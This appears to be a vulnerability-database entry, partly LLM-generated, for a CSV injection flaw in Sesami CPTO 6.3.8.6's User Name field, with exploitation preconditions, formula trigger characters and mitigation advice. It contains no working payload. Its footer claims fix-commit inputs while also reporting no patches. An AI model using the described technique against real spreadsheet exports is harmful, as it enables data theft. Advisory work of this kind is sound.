CVE-2023-31296
Description
CSV injection in Sesami CPTO v6.3.8.6 allows attackers to obtain sensitive info via the User Name field.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
CSV injection in Sesami CPTO v6.3.8.6 allows attackers to obtain sensitive info via the User Name field.
Vulnerability
CSV Injection vulnerability (CWE-1236) exists in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718). The User Name field fails to neutralize formula elements, allowing injection of spreadsheet formulas when the exported CSV is opened in software like LibreOffice Calc [1].
Exploitation
An attacker with access to the User Name field can insert a formula starting with characters such as =, +, -, @, tab, or carriage return. When an administrator exports the users list as CSV and opens it in a spreadsheet application, the formula executes automatically, potentially leaking sensitive data [1].
Impact
Successful exploitation leads to information disclosure. The attacker can craft formulas to extract data from the spreadsheet or external resources, depending on the spreadsheet software's capabilities [1].
Mitigation
Sesami has fixed the issue in a subsequent version; users should update CPTO to the latest available version. As a workaround, sanitize CSV output by wrapping each cell in double quotes, prepending each field with a single quote, and escaping internal double quotes [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Sesami/Cash Point & Transport Optimizerdescription
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Improper neutralization of formula elements in a CSV file (CWE-1236) — the User Name field is not sanitized before being written to a CSV export."
Attack vector
An attacker inserts a spreadsheet formula (e.g. starting with `=`, `+`, `-`, or `@`) into the User Name field [ref_id=1]. When an administrator exports the users list to CSV and opens that file in a spreadsheet application such as LibreOffice Calc, the formula executes [ref_id=1]. This can lead to information disclosure or further compromise of the user's machine [CWE-1236].
Affected code
The advisory does not specify particular functions or files. The vulnerability exists in the User Name field of Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718) [ref_id=1].
What the fix does
The advisory states the vendor has fixed the issue and recommends updating CPTO to its current version [ref_id=1]. No patch diff is provided. The advisory recommends sanitizing CSV output by wrapping each cell in double quotes, prepending each cell with a single quote, and escaping double quotes with an additional double quote, or ensuring no cell begins with `=`, `+`, `-`, `@`, tab, or carriage return [ref_id=1].
Preconditions
- configAn administrator must export the users list to CSV and open it in a spreadsheet application (e.g. LibreOffice Calc)
- inputThe attacker must be able to supply input to the User Name field (e.g. via user registration or profile update)
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
0No linked articles in our index yet.